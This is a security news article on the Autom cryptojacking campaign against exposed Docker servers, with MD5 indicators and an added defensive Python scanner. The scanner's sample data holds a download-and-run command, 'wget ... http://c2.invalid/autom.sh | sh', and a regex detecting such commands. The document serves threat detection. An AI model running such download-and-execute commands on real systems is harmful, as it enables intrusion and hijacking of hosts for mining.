According to researchers from DevSecOps and cloud security firm Aqua Security, who have been tracking the malware operation for the past three years, 84 attacks against its honeypot servers have been recorded to date, four of which occurred in 2021. Nonetheless, 125 attacks have been observed in the wild in the third quarter of 2021 alone, indicating that the attacks have not subsided.
Initial attacks involved running a vanilla image named “alpine:latest” and executing a malicious command, which resulted in the download of a shell script named “autom.sh.”
Researchers reported: “Adversaries frequently use vanilla images along with malicious commands to perform their attacks because most organisations trust and allow the use of official images. The malicious command that was added to the official image to carry out the attack has barely changed over the years. The primary distinction is the server from which the shell script autom.sh was obtained.”
Malware campaigns to hijack computers and mine cryptocurrencies have been dominated by multiple threat actors, such as Kinsing, which has been discovered scanning the internet for misconfigured Docker servers in order to break into the unprotected hosts and install a previously unknown coin miner strain.
Furthermore, TeamTNT has been observed attacking unsecured Redis database servers, Alibaba Elastic Computing Service (ECS) instances, exposed Docker APIs, and vulnerable Kubernetes clusters in order to execute malicious code with root privileges on the targeted hosts as well as deploy cryptocurrency-mining payloads and credential stealers. Docker Hub accounts were used to host malicious images, which were then used to distribute cryptocurrency miners.
Sophos senior threat researcher Sean Gallagher, in an analysis of a Tor2Mine mining campaign that involves the use of a PowerShell script to disable malware protection, execute a miner payload, and harvest Windows credentials, observed: “Miners are a low-risk way for cybercriminals to turn a vulnerability into digital cash, with competing miners discovering the same vulnerable servers posing the greatest risk to their cash flow.”
Security flaws in the Log4j logging library, as well as newly discovered vulnerabilities in Atlassian Confluence, F5 BIG-IP, VMware vCenter, and Oracle WebLogic Servers, have been exploited in recent weeks to take over machines and mine cryptocurrencies, a practice known as cryptojacking. QNAP, a manufacturer of network-attached storage (NAS) appliances, issued a warning earlier this month about cryptocurrency mining malware targeting its devices, which could consume up to 50% of total CPU usage.
Finally, the researchers concluded: “The Autom campaign demonstrates that attackers are becoming more sophisticated, constantly improving their techniques and ability to avoid detection by security solutions.” To defend against these threats, it is recommended that suspicious container activity be monitored, dynamic image analysis be performed, and environments be routinely scanned for misconfiguration issues.
Indicators of Compromise
Autom.sh
- MD5 c5968e2332b488076f592535c0be2473
- MD5 87e4701ccb615adc2abc82d9282d65a1
log_rotate_bin
- MD5 fb1fde1f28b2743b0f4cbb60609df95a
- MD5 1a882366d180331e5ffcb973719312d9
- MD5 ced5e2d876e8264beeade2efca075f09
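The article recommends monitoring suspicious container activity and publishes the MD5 indicators above. The following Python script is an added example written for this page, not code from Aqua Security or from the campaign, showing how a defender could apply both: it parses the JSON array that `docker inspect` prints, flags containers that were started from an official base image with a command that fetches a remote shell script (the "vanilla image plus malicious command" pattern described above), and hashes files on disk against the published indicator list. The sample inspect data, the `c2.invalid` hostname and the helper names (`flag_container`, `scan_inspect_output`, `find_ioc_matches`) are constructed for the example; the hash values are the ones listed on this page.

```python
from __future__ import annotations

import hashlib
import json
import re
from pathlib import Path

# MD5 indicators published for the Autom campaign (values taken from the list above).
AUTOM_IOC_MD5 = {
    "c5968e2332b488076f592535c0be2473": "autom.sh",
    "87e4701ccb615adc2abc82d9282d65a1": "autom.sh",
    "fb1fde1f28b2743b0f4cbb60609df95a": "log_rotate_bin",
    "1a882366d180331e5ffcb973719312d9": "log_rotate_bin",
    "ced5e2d876e8264beeade2efca075f09": "log_rotate_bin",
}

# Official base images that attackers run unmodified and then inject a command into.
# The page names alpine; the others are assumed additions for a broader watch-list.
OFFICIAL_BASE_IMAGES = {"alpine", "busybox", "ubuntu", "debian"}

# "Download a script and run it" pattern: curl/wget piped into a shell, or
# curl/wget fetching a .sh file.  Heuristic only; tune for your environment.
REMOTE_SCRIPT_EXEC = re.compile(
    r"\b(curl|wget)\b[^|;&]*\|\s*(ba)?sh\b|\b(curl|wget)\b.*\.sh\b",
    re.IGNORECASE,
)


def image_repo(image_ref: str) -> str:
    """Strip registry, namespace, tag and digest: 'docker.io/library/alpine:latest' -> 'alpine'."""
    name = image_ref.split("@", 1)[0]
    name = name.rsplit("/", 1)[-1]
    return name.split(":", 1)[0]


def flag_container(inspect_entry: dict) -> list[str]:
    """Return the reasons one `docker inspect` entry looks like an Autom-style launch."""
    config = inspect_entry.get("Config", {})
    image = config.get("Image", "")
    entrypoint = " ".join(config.get("Entrypoint") or [])
    cmd = " ".join(config.get("Cmd") or [])
    full_cmd = f"{entrypoint} {cmd}".strip()

    reasons = []
    if image_repo(image) in OFFICIAL_BASE_IMAGES and REMOTE_SCRIPT_EXEC.search(full_cmd):
        reasons.append(f"official image {image!r} started with a remote-script download: {full_cmd!r}")
    if "autom.sh" in full_cmd.lower():
        reasons.append("command references the autom.sh script name from the campaign")
    return reasons


def scan_inspect_output(inspect_json: str) -> dict[str, list[str]]:
    """Map short container id -> reasons, for every flagged entry in `docker inspect` output."""
    findings = {}
    for entry in json.loads(inspect_json):
        reasons = flag_container(entry)
        if reasons:
            findings[entry.get("Id", "?")[:12]] = reasons
    return findings


def md5_of_bytes(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def md5_of_file(path: Path) -> str:
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def find_ioc_matches(paths) -> dict[str, str]:
    """Map each file whose MD5 is on the indicator list to the indicator family name."""
    hits = {}
    for p in paths:
        digest = md5_of_file(Path(p))
        if digest in AUTOM_IOC_MD5:
            hits[str(p)] = AUTOM_IOC_MD5[digest]
    return hits


# Constructed sample in the shape of `docker inspect` output: one Autom-style
# container and one ordinary nginx container.  c2.invalid is a placeholder host.
SAMPLE_INSPECT = json.dumps([
    {
        "Id": "0123456789abcdef0123",
        "Config": {
            "Image": "alpine:latest",
            "Entrypoint": None,
            "Cmd": ["sh", "-c", "wget -q -O - http://c2.invalid/autom.sh | sh"],
        },
    },
    {
        "Id": "fedcba9876543210fedc",
        "Config": {
            "Image": "nginx:1.21",
            "Entrypoint": ["/docker-entrypoint.sh"],
            "Cmd": ["nginx", "-g", "daemon off;"],
        },
    },
])

if __name__ == "__main__":
    # Real use: docker inspect $(docker ps -aq) | python3 this_script.py
    for cid, reasons in scan_inspect_output(SAMPLE_INSPECT).items():
        print(cid, "->", "; ".join(reasons))
```

Feed real data with `docker inspect $(docker ps -aq)` piped into `scan_inspect_output`, and point `find_ioc_matches` at files dropped in container layers or on the host. The command heuristic deliberately keys on the combination the researchers describe (trusted official image plus an injected download-and-run command) rather than on a single server name, since the article notes that the download server is the part of the attack that changed over the years.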